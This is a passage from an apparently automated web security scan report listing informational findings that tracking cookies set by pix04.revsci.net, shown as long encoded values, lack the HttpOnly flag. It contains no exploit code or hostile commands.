yway+VXkYmVzkIRjZk/JO4RsDiKHPXpPy4Sn7XN1Y6Tv/3vTxbyUKAUly9zwABR7OHo718d1TvigcjXc+8aUxCN9dQViBY/htT9BEYDGUctJK7SMgEE4FHd+bMN3cKfoGI6HVIC5OijQhmmEU7UDeQ3qc2Zjim+NLebqbcRe6BYcRIn2/t8ZJgnFeg==; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:13 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:37:13 GMT
Content-Length: 1269

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','D08734_70010','D08734_70118','D08734_70613','H07707_10872','D08734_72078','H07707_10950','H07707_10954','H07707_10987','
...[SNIP]...

14.112. http://pix04.revsci.net/H07707/b3/0/3/0806180/579814010.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/H07707/b3/0/3/0806180/579814010.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPNOE/FLgIMlrE7uk0efC2MxeQiIW9f4qMA3RvoIdAx3izt0WEHmQdVL0j8gwBbwYN+xoekJT0casdPYJmCnQf6nzyeTtOvbH9yibYGuaoKzy1uAlD/7oqW6csKFkxmhZaFl+jQTmZPk9GgPR9KPyda9+JvYBz/YEF3KohORRwuZK9AfFV8ozq0Uxu091hAQBZa9/Uo5+t4x1b1kdwS1q8wH7uVyQVsOiVrGSktCzfSJjwJUPNCskC+TFybfXv0; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:29:18 GMT; Path=/
rtc_61Wz=MLuB26mvt4kSQA8cBQ5Xp5GzJe3015EFoD/95teJL+Ejr//DyFLu1LNxozaNrNCnxTv/CPBK4vwUC37I+Pw2DxDH9eVMUC9zB1mGK9JGee2kZ/rkxh9ZhsvGXmyp1GIOejNCcp29JzcATN8GDRgxtWQLVIrfqXjLYkKxH2Wkot1CcCcHEV+imu9mtVtV+fEsoPqb8Sx0EexVQw7FtCen+/ihLI/zuRtzoISDJn1i335fn+91HWdFyleqRqt2FFYHQRSR0n0huHL1bBQL7IuGA/Tq/HBv4FOro1WSc6yqw+2xjgQcQAAMVLamZ29iRGSHkD6u/g3+COdPKCANLv6T; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:29:18 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.113. http://pix04.revsci.net/H07707/b3/0/3/0806180/590965522.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/H07707/b3/0/3/0806180/590965522.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPFOEOhLgIQF/Ubw+6yiFgTmgYBdHsoJiWBBGBKsZM+kKb4NfzIzHN3SvzuFM7006496nYKZH0mewDwK4ZCtLhZXv/YmkG2JIDYc5RsuanPlKJnMTbfNOG8YkPsOtQtNuOpcPqOxFvSJgEUWankYFT2Yl9LQnW3TL6UALkyQtEqFGcKcNskrzJcBYSe/+A4gtAzKS/lFfknOREWCvgghmsmmU2RiSJrCml7kKegC4UNNRUpLiLgNEugSSIf9TomIrj+ABg1; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:28:20 GMT; Path=/
rtc_D0S9=MLuB26mvt4kSQA8cBQ5Xp5GzJe3015EFoD/95teJL+E7r/9Dz2ruFLBtozaNrNCnxTv/CPBK4vxuKCe62VWohhBnMq1x/q0J22fzirjvhsYDeU2ou1Z4c7QpH/iIvZSk4jupAadTP3jJwOGhjpBlL0D/pb7eB9//K6gCqUY7F9avCH3SeUbAKZ8SaMucKXkSP0/UCmQq5H3prJ3dI4SCV2jsz357yIBJ1Wmb9VWkVixIXqd2sv4V4HAIcSCMcLipNC98B0t/No+oQiekPIcQ2jiRXxTdKUdmHxepDyCKFkkH2RhtOjE3aHseBOExJGngyl45Qk65yXrEpCHIDf6o; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:28:20 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.114. http://pix04.revsci.net/H07707/b3/0/3/0806180/702365539.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/H07707/b3/0/3/0806180/702365539.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPNO0PF7nMYVY1Juswpg79QalFC5KCa4WX08GFNFNHV+Jbjo+n86Xli3TAlZ7sPSls+pOPn4ipzRWXtum8RaOGY6IdTfa6uoM2RcyTMRJCBbs3UiF3/XgTzeleJ3tyv0bfJW7avQEA1cAleJYg/jUnqp62rgNlrlHK8V4f2GxmXbnF6FwzLOQutobAqsf/spstzXxlFG6ck3Qo5/sFCwjE=; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:26:47 GMT; Path=/
rtc_0tQm=MLuB26mvt4kSQA8cBQ5Xp5GzJe3015EFoD/95teJL+Enr//DyFLu1LNxozaNrNCnxTv/CPBK4vwUC37I+Pw2DxDH9eVMUC9zB1mGK9JGee2kZ/rkxh9ZhsvGXmyp1GIOejNCcp29JzcATN8GDRgxtWQLVIrfqXjLYkKxH2Wkot1CcCcHEV+imu9mtVtV+fEsoPqb8Sx0EexVQw7FtCen+/ihLI/zuRtzoISDJn1i335fn+91HWdFyleqRqt2FFYHQRSR0n0huHL1bBQL7IuGA/Tq/HBv4FOro1WSc6yqw+2xjgQcQAAMVLamZ29iRGSHkD6u/g3+COdPKCAvGf4n; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:26:47 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.115. http://pix04.revsci.net/H07707/b3/0/3/0806180/71896167.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/H07707/b3/0/3/0806180/71896167.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPF4jOheHIMHvC1v6FY5OKmrgd3gbbjWobvkn1IXjnlu1LNJ9d4JolLatzGnQTLW0czBX79HxWvrpYxsDITCv5T35XD+5ksRl9Uj7OPMmjOFbBgwT0BsKikEDJN/pMm5X0yDXRc1h/0I2NQ8eJlLg63pEKsg0I5wRadaV+PrsMX5NHgYvwPC5gr3Yt2y4CuwWsFZGNb3+plg+HE3zp9eW9A0fom4BiGY4s/G+Uwj6jX05Gl0Qb4rT+TEQk0Q7B9QZZ+lu3RJU3VgQGczhMSaKNrfE5RhrcghAxB/dxrxrGWb7yoqjCXYPgAFPnXybJE07o5ZvmunP1yxWgnOTs+Lp191ypAB+cu3wXMeWrEwZKB8YUlyEeFKlYq/5OiFPisDl6Pq7gbgu9ny1a2vN7mnU/D2s/dZDDyJi4vAVUTHNc/6KyEjrKhOqJr02DQ1eIBBo4c8qk5J42uboOq7ZTwHGjle1if9lmnJrWLswxPXzGWSxeYyS+X/wZb7iiVez1yQif50PjUrppERBb2Nwi4ozEc1oqpYkSui73c8ekn0F3f4J7nsue2TMg80ybtwr5GquG4CyNacrQeoG6+zSw2jlwxR63jfJucJVOtpwvNsv3/vCFZA8SlIa/By5Pi1ol/O1t73I6hYCDLAkh5a5gSJN8bOhcV7Cy1pDAdtLXCd14KZ6b49A0HII1WAMGx8NGSr4HBi+OokZjnabBEtrWICoGrQy3BTU7Cn0budshyY1UXCv38UT9DuZGC6wNYCZRxnPGzuYlihI38INQbEBwsTZhQnloZ9pXNVA==; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:16:13 GMT; Path=/
rtc_CFSh=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:16:13 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.116. http://pix04.revsci.net/H07707/b3/0/3/0806180/747456476.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/H07707/b3/0/3/0806180/747456476.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPF4k+hOQIMDTaxq2F29/wEqICTC+braGYRkX0IsTQ0ubO+NO1EqsJ5SuHqPlIcMQ/cyPekhZ3rugfzV/JfmwFGk3Mf/4Y6bYkUU1SZC9gAvyLH44nAucnlFzNXQvOb0+40/8tqbVJiwzk7nGYOEycePb5NH+vhetLHppwKkT+DzHpQx+SwiWGQ8fqSkc+eciUJZOOO/95NLn+u90m99YF9dFiemRsTzrivcBIXPvyJIVyEnVxqat2dbyw4AVwVnd7dqBwWXPb9Vtb5nTbKa609dWsX4bdLx83SHTvYwma88ioXl3LyD2l6Dli1z26tTPqkF/+hATPktdD/dIkKKQ/Wtx+RM2lX57SoOUxM8Qd+jF0dwJi3ezET/tQF0yDTCpdW1oNcV/WRpaFL41ViEct/w9vaaz85Dy7Y7z/LzGzihKy1i74LGRozTRRWS9a+jmUvYtMVj/ZIqv67AcTQp+lNVJYDCXjRjvveqDo24tNu5ytOYLlMKsKUmVnbtPJCbI6HRZ6zxSdeNvVryuiFi+2JaKd3KUrI1J6qdS3CXETsHccFguCNRhp5Q3puU9Qys6K+iIGSBndOiS6ucIBoVS2/BrRMr3P0VjbBYF71Jf46PUnFjLC0ARoLnHUNR1ssPJxDjs7CD3TptS9OKVFyWaPj/h+k/1OWudj9nfK+CDw0Q3q3LVBNa5XyYrXf2ujmqG+We8UwYvTarT+g8g/QPHk8MI8hD+XG/BwGS01ckTs53jJdv4L6y4siLA2S8LOWcs1lyhBy26B82dfsUlqZieTZYPsJJS38KN0R; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:36:49 GMT; Path=/
rtc_xTlF=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:36:49 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.117. http://pix04.revsci.net/H07707/b3/0/3/0806180/848419951.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/H07707/b3/0/3/0806180/848419951.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPF4kmhOHMQJvAtY6gq+mkAZPosg7ZjSjmgIGbYEtpU+w6+9L4ioURjDVUZb5s2bJaZJyc3lSTsOodoc+LzjgnPXWfftsdz6As2U+S4m3sZ93GnJHkwYOujESwdtKPV2XiklIXPPxY08/+jghS00wcrqZXadzeLZbfrn9ShlwBQ2xmbpA283BtMERrEkp0Jl7AlGaEi8uw/pmdbkTDTCxPk3RxS+r7mTK51H+dLGRbW1fSty/wzVcn4GiBJEhk/0uP0JFLwQAUiAigtm0ZNVycI9AGE/kbo+Gm2GaMwx2IDZVAxGSGKhVfyxDow7LMEpP+/5AxB2aqXpAeWvKTgzd0wbPD0VLITZHo4oKcp6znXDZ/0QtZDxMyG+eh98ur0yF4RcpWqIFje74P6+IbKGLCNtlohZ7Nav9yQLQTHzDaAO7J7qQoTim2Po4jbIQeMv4V1ddr3kuTn07MfTvRxxboUYTCuOfPSwiCu87XOT4VkUrTUsApznyu8h9UrtX1A+eGVmZHV1i9H5FVlSMYV26zae1BGTaVDu19oJh0g6OQ/s8arz/cmOTmFie/7fnhKouJ+5wZJLzMT79s7HngcVxnNORtmtkxap8qWggfgODBjtQ8ig0EDjcYoKBHHKBVVdroIASuQN7mVEL0K0TzsgMMWXaKWYBW9/iOx9pWkUNPSZL0M2RzvR9D/7jyN/29EhW9QJ959OWVt+j0usQmpIR7mRCF/ajlARlpFSZwaumyPoKorInGvgmN+DJxH9uO8o1yz+7oRSaHzNp10QI1YjBXWMklCIpzZV9sYpcGp7usKbFyeozpl+ePO2/9SPMsdM6qLGHvuxxE=; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:40:34 GMT; Path=/
rtc_cPyi=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:40:34 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.118. http://pix04.revsci.net/H07707/b3/0/3/0806180/912026619.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/H07707/b3/0/3/0806180/912026619.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPF4k+huXIQJ/AtY6gq+ml3T51epqLBQmL8IGbY2gQ4O3XYKvnesHJskvAjloepK631i+WEhWmrGkG9POozi7inp/3S9t0/IkxBMjdPeK2r1xOnBR+A8KgmFzpR3pMg5V0STXRc5h/sA2NQ8SJlLg63pEKsg0I5wRad6dbI4VuGWq0qyRY6oFRDcRF2ywDPp/l2ZM/I/17S1FdjMhMyzTpwiyFgMBvjzji/YDIpZH9+iRia02zqup5Uc4RB7fdpzSNwFedZ7rF5pmLypIrhS6jTxXdihxtKUvnVp3q4CZDvvMwKRSQUBIW8aKH6yqDjLLFCxPSykE7ev85UXsanukFhZ9jYJjEs313/TmtNJZjZKdkEwlKP+EpScAuabJwc2MVWU5pKqCBEiB/oMmqVrjImbeGElhPS91RP79kBRGAMI3fkhrHTOrUB9Nj+DoZKH4lbg3Y3J9fn8ovUmELM6+fTLDZn64dD6QhCAEzHeyhtNq/gwTK3++V4LRJN+nSAfcUw3lASsUZNnfJXTu8Q6bEhNzGSJQRi7/mcA+9ehrTH4KDTZbkJv7PT4yxIEMkCSgxLn6HSWeEolJQXExDVPWrP/cJ3hVepclllkb9wBj0AY1yZEwqutB2h4qxbtUMBqUHh6OSHAx9XJ2YkwMZHL/CCmBi2npcpOJ+5/TUDcglD1Y7oRv43ayXSghpU5rlQGkOeKu+yDGQAXXWVB4yBSqHOppm9zCE0PdS2yri1Rj97MbjhcH+2CxSiFDOCK/fCv/